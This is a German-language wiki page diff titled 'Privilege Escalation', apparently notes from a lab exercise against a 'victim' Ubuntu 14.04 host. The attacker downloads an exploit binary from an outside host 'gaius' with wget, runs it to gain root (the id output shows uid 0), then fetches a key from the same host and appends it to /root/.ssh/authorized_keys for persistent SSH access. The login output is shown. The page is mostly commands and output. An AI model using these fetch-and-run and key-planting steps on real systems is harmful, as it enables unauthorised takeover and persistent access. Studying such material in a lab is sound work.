Privilege Escalation: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 12: | Zeile 12: | ||
*wget http://gaius/root.key | *wget http://gaius/root.key | ||
*cat root.key >> /root/.ssh/authorized_keys | *cat root.key >> /root/.ssh/authorized_keys | ||
| + | *ssh root@10.0.5.104 | ||
| + | <pre> | ||
| + | The authenticity of host '10.0.5.104 (10.0.5.104)' can't be established. | ||
| + | ECDSA key fingerprint is SHA256:5gsfiKQ0L68lsHDiA1+Qw16XsWIhpfv+SzkFKzx/pGE. | ||
| + | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes | ||
| + | Warning: Permanently added '10.0.5.104' (ECDSA) to the list of known hosts. | ||
| + | Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64) | ||
| + | |||
| + | * Documentation: https://help.ubuntu.com/ | ||
| + | |||
| + | System information as of Wed Sep 28 18:55:31 CEST 2022 | ||
| + | |||
| + | System load: 0.03 Processes: 149 | ||
| + | Usage of /: 22.5% of 17.59GB Users logged in: 1 | ||
| + | Memory usage: 25% IP address for eth0: 10.0.5.104 | ||
| + | Swap usage: 0% IP address for docker0: 172.17.42.1 | ||
| + | |||
| + | Graph this data and manage this system at: | ||
| + | https://landscape.canonical.com/ | ||
| + | |||
| + | You have mail. | ||
| + | Last login: Mon Jul 5 15:26:14 2021 from 10.0.10.2 | ||
| + | </pre> | ||
Version vom 28. September 2022, 17:03 Uhr
Wieder auf den Opfer
Exploit runterladen und Ausführungsrecht geben
- cd /tmp
- wget http://gaius/hack
- chmod +x hack
Exploit ausfühen
- ./hack
- id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Wir sind nun root
id.pub einbauen
- wget http://gaius/root.key
- cat root.key >> /root/.ssh/authorized_keys
- ssh root@10.0.5.104
The authenticity of host '10.0.5.104 (10.0.5.104)' can't be established.
ECDSA key fingerprint is SHA256:5gsfiKQ0L68lsHDiA1+Qw16XsWIhpfv+SzkFKzx/pGE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.5.104' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Wed Sep 28 18:55:31 CEST 2022
System load: 0.03 Processes: 149
Usage of /: 22.5% of 17.59GB Users logged in: 1
Memory usage: 25% IP address for eth0: 10.0.5.104
Swap usage: 0% IP address for docker0: 172.17.42.1
Graph this data and manage this system at:
https://landscape.canonical.com/
You have mail.
Last login: Mon Jul 5 15:26:14 2021 from 10.0.10.2